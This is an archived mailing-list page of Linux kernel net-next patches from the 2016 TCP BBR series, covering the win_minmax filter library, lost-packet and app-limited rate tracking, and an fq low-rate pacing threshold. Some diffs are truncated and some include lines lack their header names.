 include/net/tcp.h  |  53 ++-
 include/uapi/linux/inet_diag.h |  13 +
 include/uapi/linux/pkt_sched.h |   2 +
 include/uapi/linux/tcp.h   |   3 +
 lib/Makefile   |   2 +-
 lib/win_minmax.c   |  98 +
 net/ipv4/Kconfig   |  18 +
 net/ipv4/Makefile  |   3 +-
 net/ipv4/tcp.c |  26 +-
 net/ipv4/tcp_bbr.c | 875 +
 net/ipv4/tcp_cdg.c |  12 +-
 net/ipv4/tcp_cong.c|   2 +-
 net/ipv4/tcp_input.c   | 154 +++
 net/ipv4/tcp_minisocks.c   |   5 +-
 net/ipv4/tcp_output.c  |  27 +-
 net/ipv4/tcp_rate.c| 186 
 net/sched/sch_fq.c |  22 +-
 20 files changed, 1449 insertions(+), 107 deletions(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c
 create mode 100644 net/ipv4/tcp_bbr.c
 create mode 100644 net/ipv4/tcp_rate.c

-- 
2.8.0.rc3.226.g39d4020

[PATCH v3 net-next 01/16] tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict

2016-09-18 Thread Neal Cardwell

From: Soheil Hassas Yeganeh 

The upcoming change "lib/win_minmax: windowed min or max estimator"
introduces a struct called minmax, which is then included in
include/linux/tcp.h in the upcoming change "tcp: use windowed min
filter library for TCP min_rtt estimation". This would create a
compilation error for tcp_cdg.c, which defines its own minmax
struct. To avoid this naming conflict (and potentially others in the
future), this commit renames the version used in tcp_cdg.c to
cdg_minmax.

Signed-off-by: Soheil Hassas Yeganeh 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Eric Dumazet 
Cc: Kenneth Klette Jonassen 
---
 net/ipv4/tcp_cdg.c | 12 ++--
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/ipv4/tcp_cdg.c b/net/ipv4/tcp_cdg.c
index 03725b2..35b2803 100644
--- a/net/ipv4/tcp_cdg.c
+++ b/net/ipv4/tcp_cdg.c
@@ -56,7 +56,7 @@ MODULE_PARM_DESC(use_shadow, "use shadow window heuristic");
 module_param(use_tolerance, bool, 0644);
 MODULE_PARM_DESC(use_tolerance, "use loss tolerance heuristic");
 
-struct minmax {
+struct cdg_minmax {
union {
struct {
s32 min;
@@ -74,10 +74,10 @@ enum cdg_state {
 };
 
 struct cdg {
-   struct minmax rtt;
-   struct minmax rtt_prev;
-   struct minmax *gradients;
-   struct minmax gsum;
+   struct cdg_minmax rtt;
+   struct cdg_minmax rtt_prev;
+   struct cdg_minmax *gradients;
+   struct cdg_minmax gsum;
bool gfilled;
u8  tail;
u8  state;
@@ -353,7 +353,7 @@ static void tcp_cdg_cwnd_event(struct sock *sk, const enum 
tcp_ca_event ev)
 {
struct cdg *ca = inet_csk_ca(sk);
struct tcp_sock *tp = tcp_sk(sk);
-   struct minmax *gradients;
+   struct cdg_minmax *gradients;
 
switch (ev) {
case CA_EVENT_CWND_RESTART:
-- 
2.8.0.rc3.226.g39d4020

[PATCH v3 net-next 06/16] tcp: count packets marked lost for a TCP connection

2016-09-18 Thread Neal Cardwell

Count the number of packets that a TCP connection marks lost.

Congestion control modules can use this loss rate information for more
intelligent decisions about how fast to send.

Specifically, this is used in TCP BBR policer detection. BBR uses a
high packet loss rate as one signal in its policer detection and
policer bandwidth estimation algorithm.

The BBR policer detection algorithm cannot simply track retransmits,
because a retransmit can be (and often is) an indicator of packets
lost long, long ago. This is particularly true in a long CA_Loss
period that repairs the initial massive losses when a policer kicks
in.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/tcp.h  |  1 +
 net/ipv4/tcp_input.c | 25 -
 2 files changed, 25 insertions(+), 1 deletion(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index 6433cc8..38590fb 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -267,6 +267,7 @@ struct tcp_sock {
 * receiver in Recovery. */
u32 prr_out;/* Total number of pkts sent during Recovery. */
u32 delivered;  /* Total data packets delivered incl. rexmits */
+   u32 lost;   /* Total data packets lost incl. rexmits */
 
u32 rcv_wnd;/* Current receiver window  */
u32 write_seq;  /* Tail(+1) of data held in tcp send buffer */
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index ac5b38f..024b579 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -899,12 +899,29 @@ static void tcp_verify_retransmit_hint(struct tcp_sock 
*tp, struct sk_buff *skb)
tp->retransmit_high = TCP_SKB_CB(skb)->end_seq;
 }
 
+/* Sum the number of packets on the wire we have marked as lost.
+ * There are two cases we care about here:
+ * a) Packet hasn't been marked lost (nor retransmitted),
+ *and this is the first loss.
+ * b) Packet has been marked both lost and retransmitted,
+ *and this means we think it was lost again.
+ */
+static void tcp_sum_lost(struct tcp_sock *tp, struct sk_buff *skb)
+{
+   __u8 sacked = TCP_SKB_CB(skb)->sacked;
+
+   if (!(sacked & TCPCB_LOST) ||
+   ((sacked & TCPCB_LOST) && (sacked & TCPCB_SACKED_RETRANS)))
+   tp->lost += tcp_skb_pcount(skb);
+}
+
 static void tcp_skb_mark_lost(struct tcp_sock *tp, struct sk_buff *skb)
 {
if (!(TCP_SKB_CB(skb)->sacked & (TCPCB_LOST|TCPCB_SACKED_ACKED))) {
tcp_verify_retransmit_hint(tp, skb);
 
tp->lost_out += tcp_skb_pcount(skb);
+   tcp_sum_lost(tp, skb);
TCP_SKB_CB(skb)->sacked |= TCPCB_LOST;
}
 }
@@ -913,6 +930,7 @@ void tcp_skb_mark_lost_uncond_verify(struct tcp_sock *tp, 
struct sk_buff *skb)
 {
tcp_verify_retransmit_hint(tp, skb);
 
+   tcp_sum_lost(tp, skb);
if (!(TCP_SKB_CB(skb)->sacked & (TCPCB_LOST|TCPCB_SACKED_ACKED))) {
tp->lost_out += tcp_skb_pcount(skb);
TCP_SKB_CB(skb)->sacked |= TCPCB_LOST;
@@ -1890,6 +1908,7 @@ void tcp_enter_loss(struct sock *sk)
struct sk_buff *skb;
bool new_recovery = icsk->icsk_ca_state < TCP_CA_Recovery;
bool is_reneg;  /* is receiver reneging on SACKs? */
+   bool mark_lost;
 
/* Reduce ssthresh if it has not yet been made inside this window. */
if (icsk->icsk_ca_state <= TCP_CA_Disorder ||
@@ -1923,8 +1942,12 @@ void tcp_enter_loss(struct sock *sk)
if (skb == tcp_send_head(sk))
break;
 
+   mark_lost = (!(TCP_SKB_CB(skb)->sacked & TCPCB_SACKED_ACKED) ||
+is_reneg);
+   if (mark_lost)
+   tcp_sum_lost(tp, skb);
TCP_SKB_CB(skb)->sacked &= (~TCPCB_TAGBITS)|TCPCB_SACKED_ACKED;
-   if (!(TCP_SKB_CB(skb)->sacked&TCPCB_SACKED_ACKED) || is_reneg) {
+   if (mark_lost) {
TCP_SKB_CB(skb)->sacked &= ~TCPCB_SACKED_ACKED;
TCP_SKB_CB(skb)->sacked |= TCPCB_LOST;
tp->lost_out += tcp_skb_pcount(skb);
-- 
2.8.0.rc3.226.g39d4020

[PATCH v3 net-next 04/16] net_sched: sch_fq: add low_rate_threshold parameter

2016-09-18 Thread Neal Cardwell

From: Eric Dumazet 

This commit adds to the fq module a low_rate_threshold parameter to
insert a delay after all packets if the socket requests a pacing rate
below the threshold.

This helps achieve more precise control of the sending rate with
low-rate paths, especially policers. The basic issue is that if a
congestion control module detects a policer at a certain rate, it may
want fq to be able to shape to that policed rate. That way the sender
can avoid policer drops by having the packets arrive at the policer at
or just under the policed rate.

The default threshold of 550Kbps was chosen analytically so that for
policers or links at 500Kbps or 512Kbps fq would very likely invoke
this mechanism, even if the pacing rate was briefly slightly above the
available bandwidth. This value was then empirically validated with
two years of production testing on YouTube video servers.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/uapi/linux/pkt_sched.h |  2 ++
 net/sched/sch_fq.c | 22 +++---
 2 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/include/uapi/linux/pkt_sched.h b/include/uapi/linux/pkt_sched.h
index 2382eed..f8e39db 100644
--- a/include/uapi/linux/pkt_sched.h
+++ b/include/uapi/linux/pkt_sched.h
@@ -792,6 +792,8 @@ enum {
 
TCA_FQ_ORPHAN_MASK, /* mask applied to orphaned skb hashes */
 
+   TCA_FQ_LOW_RATE_THRESHOLD, /* per packet delay under this rate */
+
__TCA_FQ_MAX
 };
 
diff --git a/net/sched/sch_fq.c b/net/sched/sch_fq.c
index e5458b9..40ad4fc 100644
--- a/net/sched/sch_fq.c
+++ b/net/sched/sch_fq.c
@@ -94,6 +94,7 @@ struct fq_sched_data {
u32 flow_max_rate;  /* optional max rate per flow */
u32 flow_plimit;/* max packets per flow */
u32 orphan_mask;/* mask for orphaned skb */
+   u32 low_rate_threshold;
struct rb_root  *fq_root;
u8  rate_enable;
u8  fq_trees_log;
@@ -433,7 +434,7 @@ static struct sk_buff *fq_dequeue(struct Qdisc *sch)
struct fq_flow_head *head;
struct sk_buff *skb;
struct fq_flow *f;
-   u32 rate;
+   u32 rate, plen;
 
skb = fq_dequeue_head(sch, &q->internal);
if (skb)
@@ -482,7 +483,7 @@ begin:
prefetch(&skb->end);
f->credit -= qdisc_pkt_len(skb);
 
-   if (f->credit > 0 || !q->rate_enable)
+   if (!q->rate_enable)
goto out;
 
/* Do not pace locally generated ack packets */
@@ -493,8 +494,15 @@ begin:
if (skb->sk)
rate = min(skb->sk->sk_pacing_rate, rate);
 
+   if (rate <= q->low_rate_threshold) {
+   f->credit = 0;
+   plen = qdisc_pkt_len(skb);
+   } else {
+   plen = max(qdisc_pkt_len(skb), q->quantum);
+   if (f->credit > 0)
+   goto out;
+   }
if (rate != ~0U) {
-   u32 plen = max(qdisc_pkt_len(skb), q->quantum);
u64 len = (u64)plen * NSEC_PER_SEC;
 
if (likely(rate))
@@ -662,6 +670,7 @@ static const struct nla_policy fq_policy[TCA_FQ_MAX + 1] = {
[TCA_FQ_FLOW_MAX_RATE]  = { .type = NLA_U32 },
[TCA_FQ_BUCKETS_LOG]= { .type = NLA_U32 },
[TCA_FQ_FLOW_REFILL_DELAY]  = { .type = NLA_U32 },
+   [TCA_FQ_LOW_RATE_THRESHOLD] = { .type = NLA_U32 },
 };
 
 static int fq_change(struct Qdisc *sch, struct nlattr *opt)
@@ -716,6 +725,10 @@ static int fq_change(struct Qdisc *sch, struct nlattr *opt)
if (tb[TCA_FQ_FLOW_MAX_RATE])
q->flow_max_rate = nla_get_u32(tb[TCA_FQ_FLOW_MAX_RATE]);
 
+   if (tb[TCA_FQ_LOW_RATE_THRESHOLD])
+   q->low_rate_threshold =
+   nla_get_u32(tb[TCA_FQ_LOW_RATE_THRESHOLD]);
+
if (tb[TCA_FQ_RATE_ENABLE]) {
u32 enable = nla_get_u32(tb[TCA_FQ_RATE_ENABLE]);
 
@@ -781,6 +794,7 @@ static int fq_init(struct Qdisc *sch, struct nlattr *opt)
q->fq_root  = NULL;
q->fq_trees_log = ilog2(1024);
q->orphan_mask  = 1024 - 1;
+   q->low_rate_threshold   = 55 / 8;
qdisc_watchdog_init(&q->watchdog, sch);
 
if (opt)
@@ -811,6 +825,8 @@ static int fq_dump(struct Qdisc *sch, struct sk_buff *skb)
nla_put_u32(skb, TCA_FQ_FLOW_REFILL_DELAY,
jiffies_to_usecs(q->flow_refill_delay)) ||
nla_put_u32(skb, TCA_FQ_ORPHAN_MASK, q->orphan_mask) ||
+   nla_put_u32(skb, TCA_FQ_LOW_RATE_THRESHOLD,
+   q->low_rate_threshold) ||
nla_put_u32(skb, TCA_FQ_BUCKETS_LOG, q->fq_trees_log))
goto nla_put_failure;
 
-- 
2.8.0.rc3.226.g39d4020

[PATCH v3 net-next 03/16] tcp: use windowed min filter library for TCP min_rtt estimation

2016-09-18 Thread Neal Cardwell

Refactor the TCP min_rtt code to reuse the new win_minmax library in
lib/win_minmax.c to simplify the TCP code.

This is a pure refactor: the functionality is exactly the same. We
just moved the windowed min code to make TCP easier to read and
maintain, and to allow other parts of the kernel to use the windowed
min/max filter code.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/tcp.h  |  5 ++--
 include/net/tcp.h|  2 +-
 net/ipv4/tcp.c   |  2 +-
 net/ipv4/tcp_input.c | 64 
 net/ipv4/tcp_minisocks.c |  2 +-
 5 files changed, 10 insertions(+), 65 deletions(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index c723a46..6433cc8 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -19,6 +19,7 @@
 
 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -234,9 +235,7 @@ struct tcp_sock {
u32 mdev_max_us;/* maximal mdev for the last rtt period */
u32 rttvar_us;  /* smoothed mdev_max*/
u32 rtt_seq;/* sequence number to update rttvar */
-   struct rtt_meas {
-   u32 rtt, ts;/* RTT in usec and sampling time in jiffies. */
-   } rtt_min[3];
+   struct  minmax rtt_min;
 
u32 packets_out;/* Packets which are "in flight"*/
u32 retrans_out;/* Retransmitted packets out*/
diff --git a/include/net/tcp.h b/include/net/tcp.h
index fdfbedd..2f1648a 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -671,7 +671,7 @@ static inline bool tcp_ca_dst_locked(const struct dst_entry 
*dst)
 /* Minimum RTT in usec. ~0 means not available. */
 static inline u32 tcp_min_rtt(const struct tcp_sock *tp)
 {
-   return tp->rtt_min[0].rtt;
+   return minmax_get(&tp->rtt_min);
 }
 
 /* Compute the actual receive window we are currently advertising.
diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
index a13fcb3..5b0b49c 100644
--- a/net/ipv4/tcp.c
+++ b/net/ipv4/tcp.c
@@ -387,7 +387,7 @@ void tcp_init_sock(struct sock *sk)
 
icsk->icsk_rto = TCP_TIMEOUT_INIT;
tp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
-   tp->rtt_min[0].rtt = ~0U;
+   minmax_reset(&tp->rtt_min, tcp_time_stamp, ~0U);
 
/* So many TCP implementations out there (incorrectly) count the
 * initial SYN frame in their delayed-ACK and congestion control
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index 70b892d..ac5b38f 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -2879,67 +2879,13 @@ static void tcp_fastretrans_alert(struct sock *sk, 
const int acked,
*rexmit = REXMIT_LOST;
 }
 
-/* Kathleen Nichols' algorithm for tracking the minimum value of
- * a data stream over some fixed time interval. (E.g., the minimum
- * RTT over the past five minutes.) It uses constant space and constant
- * time per update yet almost always delivers the same minimum as an
- * implementation that has to keep all the data in the window.
- *
- * The algorithm keeps track of the best, 2nd best & 3rd best min
- * values, maintaining an invariant that the measurement time of the
- * n'th best >= n-1'th best. It also makes sure that the three values
- * are widely separated in the time window since that bounds the worse
- * case error when that data is monotonically increasing over the window.
- *
- * Upon getting a new min, we can forget everything earlier because it
- * has no value - the new min is <= everything else in the window by
- * definition and it's the most recent. So we restart fresh on every new min
- * and overwrites 2nd & 3rd choices. The same property holds for 2nd & 3rd
- * best.
- */
 static void tcp_update_rtt_min(struct sock *sk, u32 rtt_us)
 {
-   const u32 now = tcp_time_stamp, wlen = sysctl_tcp_min_rtt_wlen * HZ;
-   struct rtt_meas *m = tcp_sk(sk)->rtt_min;
-   struct rtt_meas rttm = {
-   .rtt = likely(rtt_us) ? rtt_us : jiffies_to_usecs(1),
-   .ts = now,
-   };
-   u32 elapsed;
-
-   /* Check if the new measurement updates the 1st, 2nd, or 3rd choices */
-   if (unlikely(rttm.rtt <= m[0].rtt))
-   m[0] = m[1] = m[2] = rttm;
-   else if (rttm.rtt <= m[1].rtt)
-   m[1] = m[2] = rttm;
-   else if (rttm.rtt <= m[2].rtt)
-   m[2] = rttm;
-
-   elapsed = now - m[0].ts;
-   if (unlikely(elapsed > wlen)) {
-   /* Passed entire window without a new min so make 2nd choice
-* the new min & 3rd choice the new 2nd. So forth and so on.
-*/
-   m[0] = m[1];
-   m[1] = m[2];
-   m[2] = rttm;
-   if (now - m[0].ts > wlen) {
-   m[0] = m[1];
-   m[1] = rttm;
-

[PATCH v3 net-next 02/16] lib/win_minmax: windowed min or max estimator

2016-09-18 Thread Neal Cardwell

This commit introduces a generic library to estimate either the min or
max value of a time-varying variable over a recent time window. This
is code originally from Kathleen Nichols. The current form of the code
is from Van Jacobson.

A single struct minmax_sample will track the estimated windowed-max
value of the series if you call minmax_running_max() or the estimated
windowed-min value of the series if you call minmax_running_min().

Nearly equivalent code is already in place for minimum RTT estimation
in the TCP stack. This commit extracts that code and generalizes it to
handle both min and max. Moving the code here reduces the footprint
and complexity of the TCP code base and makes the filter generally
available for other parts of the codebase, including an upcoming TCP
congestion control module.

This library works well for time series where the measurements are
smoothly increasing or decreasing.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/win_minmax.h | 37 +
 lib/Makefile   |  2 +-
 lib/win_minmax.c   | 98 ++
 3 files changed, 136 insertions(+), 1 deletion(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c

diff --git a/include/linux/win_minmax.h b/include/linux/win_minmax.h
new file mode 100644
index 000..5656960
--- /dev/null
+++ b/include/linux/win_minmax.h
@@ -0,0 +1,37 @@
+/**
+ * lib/minmax.c: windowed min/max tracker by Kathleen Nichols.
+ *
+ */
+#ifndef MINMAX_H
+#define MINMAX_H
+
+#include 
+
+/* A single data point for our parameterized min-max tracker */
+struct minmax_sample {
+   u32 t;  /* time measurement was taken */
+   u32 v;  /* value measured */
+};
+
+/* State for the parameterized min-max tracker */
+struct minmax {
+   struct minmax_sample s[3];
+};
+
+static inline u32 minmax_get(const struct minmax *m)
+{
+   return m->s[0].v;
+}
+
+static inline u32 minmax_reset(struct minmax *m, u32 t, u32 meas)
+{
+   struct minmax_sample val = { .t = t, .v = meas };
+
+   m->s[2] = m->s[1] = m->s[0] = val;
+   return m->s[0].v;
+}
+
+u32 minmax_running_max(struct minmax *m, u32 win, u32 t, u32 meas);
+u32 minmax_running_min(struct minmax *m, u32 win, u32 t, u32 meas);
+
+#endif
diff --git a/lib/Makefile b/lib/Makefile
index 5dc77a8..df747e5 100644
--- a/lib/Makefile
+++ b/lib/Makefile
@@ -22,7 +22,7 @@ lib-y := ctype.o string.o vsprintf.o cmdline.o \
 sha1.o chacha20.o md5.o irq_regs.o argv_split.o \
 flex_proportions.o ratelimit.o show_mem.o \
 is_single_threaded.o plist.o decompress.o kobject_uevent.o \
-earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o
+earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o win_minmax.o
 
 lib-$(CONFIG_MMU) += ioremap.o
 lib-$(CONFIG_SMP) += cpumask.o
diff --git a/lib/win_minmax.c b/lib/win_minmax.c
new file mode 100644
index 000..c8420d4
--- /dev/null
+++ b/lib/win_minmax.c
@@ -0,0 +1,98 @@
+/**
+ * lib/minmax.c: windowed min/max tracker
+ *
+ * Kathleen Nichols' algorithm for tracking the minimum (or maximum)
+ * value of a data stream over some fixed time interval.  (E.g.,
+ * the minimum RTT over the past five minutes.) It uses constant
+ * space and constant time per update yet almost always delivers
+ * the same minimum as an implementation that has to keep all the
+ * data in the window.
+ *
+ * The algorithm keeps track of the best, 2nd best & 3rd best min
+ * values, maintaining an invariant that the measurement time of
+ * the n'th best >= n-1'th best. It also makes sure that the three
+ * values are widely separated in the time window since that bounds
+ * the worse case error when that data is monotonically increasing
+ * over the window.
+ *
+ * Upon getting a new min, we can forget everything earlier because
+ * it has no value - the new min is <= everything else in the window
+ * by definition and it's the most recent. So we restart fresh on
+ * every new min and overwrites 2nd & 3rd choices. The same property
+ * holds for 2nd & 3rd best.
+ */
+#include 
+#include 
+
+/* As time advances, update the 1st, 2nd, and 3rd choices. */
+static u32 minmax_subwin_update(struct minmax *m, u32 win,
+   const struct minmax_sample *val)
+{
+   u32 dt = val->t - m->s[0].t;
+
+   if (unlikely(dt > win)) {
+   /*
+* Passed entire window without a new val so make 2nd
+* choice the new val & 3rd choice the new 2nd choice.
+* we may have to iterate this since our 2nd choice
+* may also be outside the window (we checked on entry
+* that the third choice was in the window).
+*/
+   m->s[0] = m->s[1];
+   m->s[1] = m->s[2];
+

[PATCH v3 net-next 08/16] tcp: track application-limited rate samples

2016-09-18 Thread Neal Cardwell

From: Soheil Hassas Yeganeh 

This commit adds code to track whether the delivery rate represented
by each rate_sample was limited by the application.

Upon each transmit, we store in the is_app_limited field in the skb a
boolean bit indicating whether there is a known "bubble in the pipe":
a point in the rate sample interval where the sender was
application-limited, and did not transmit even though the cwnd and
pacing rate allowed it.

This logic marks the flow app-limited on a write if *all* of the
following are true:

  1) There is less than 1 MSS of unsent data in the write queue
 available to transmit.

  2) There is no packet in the sender's queues (e.g. in fq or the NIC
 tx queue).

  3) The connection is not limited by cwnd.

  4) There are no lost packets to retransmit.

The tcp_rate_check_app_limited() code in tcp_rate.c determines whether
the connection is application-limited at the moment. If the flow is
application-limited, it sets the tp->app_limited field. If the flow is
application-limited then that means there is effectively a "bubble" of
silence in the pipe now, and this silence will be reflected in a lower
bandwidth sample for any rate samples from now until we get an ACK
indicating this bubble has exited the pipe: specifically, until we get
an ACK for the next packet we transmit.

When we send every skb we record in scb->tx.is_app_limited whether the
resulting rate sample will be application-limited.

The code in tcp_rate_gen() checks to see when it is safe to mark all
known application-limited bubbles of silence as having exited the
pipe. It does this by checking to see when the delivered count moves
past the tp->app_limited marker. At this point it zeroes the
tp->app_limited marker, as all known bubbles are out of the pipe.

We make room for the tx.is_app_limited bit in the skb by borrowing a
bit from the in_flight field used by NV to record the number of bytes
in flight. The receive window in the TCP header is 16 bits, and the
max receive window scaling shift factor is 14 (RFC 1323). So the max
receive window offered by the TCP protocol is 2^(16+14) = 2^30. So we
only need 30 bits for the tx.in_flight used by NV.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/tcp.h  |  1 +
 include/net/tcp.h|  6 +-
 net/ipv4/tcp.c   |  8 
 net/ipv4/tcp_minisocks.c |  3 +++
 net/ipv4/tcp_rate.c  | 29 -
 5 files changed, 45 insertions(+), 2 deletions(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index c50e6ae..fdcd00f 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -268,6 +268,7 @@ struct tcp_sock {
u32 prr_out;/* Total number of pkts sent during Recovery. */
u32 delivered;  /* Total data packets delivered incl. rexmits */
u32 lost;   /* Total data packets lost incl. rexmits */
+   u32 app_limited;/* limited until "delivered" reaches this val */
struct skb_mstamp first_tx_mstamp;  /* start of window send phase */
struct skb_mstamp delivered_mstamp; /* time we reached "delivered" */
 
diff --git a/include/net/tcp.h b/include/net/tcp.h
index b261c89..a69ed7f 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -764,7 +764,9 @@ struct tcp_skb_cb {
union {
struct {
/* There is space for up to 24 bytes */
-   __u32 in_flight;/* Bytes in flight when packet sent */
+   __u32 in_flight:30,/* Bytes in flight at transmit */
+ is_app_limited:1, /* cwnd not fully used? */
+ unused:1;
/* pkts S/ACKed so far upon tx of skb, incl retrans: */
__u32 delivered;
/* start of send pipeline phase */
@@ -883,6 +885,7 @@ struct rate_sample {
int  losses;/* number of packets marked lost upon ACK */
u32  acked_sacked;  /* number of packets newly (S)ACKed upon ACK */
u32  prior_in_flight;   /* in flight before this ACK */
+   bool is_app_limited;/* is sample from packet with bubble in pipe? */
bool is_retrans;/* is sample from retransmission? */
 };
 
@@ -978,6 +981,7 @@ void tcp_rate_skb_delivered(struct sock *sk, struct sk_buff 
*skb,
struct rate_sample *rs);
 void tcp_rate_gen(struct sock *sk, u32 delivered, u32 lost,
  struct skb_mstamp *now, struct rate_sample *rs);
+void tcp_rate_check_app_limited(struct sock *sk);
 
 /* These functions determine how the current flow behaves in respect of SACK
  * handling. SACK is negotiated with the peer, and therefore it can vary
diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
index 53798e1..0327a44 100644
--- a/net/ipv4/tcp.c

[PATCH v3 net-next 12/16] tcp: export tcp_mss_to_mtu() for congestion control modules

2016-09-18 Thread Neal Cardwell

Export tcp_mss_to_mtu(), so that congestion control modules can use
this to help calculate a pacing rate.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 net/ipv4/tcp_output.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
index 0bf3d48..7d025a7 100644
--- a/net/ipv4/tcp_output.c
+++ b/net/ipv4/tcp_output.c
@@ -1362,6 +1362,7 @@ int tcp_mss_to_mtu(struct sock *sk, int mss)
}
return mtu;
 }
+EXPORT_SYMBOL(tcp_mss_to_mtu);
 
 /* MTU probing init per socket */
 void tcp_mtup_init(struct sock *sk)
-- 
2.8.0.rc3.226.g39d4020

1 2 >

1 - 100 of 166 matches

Mail list logo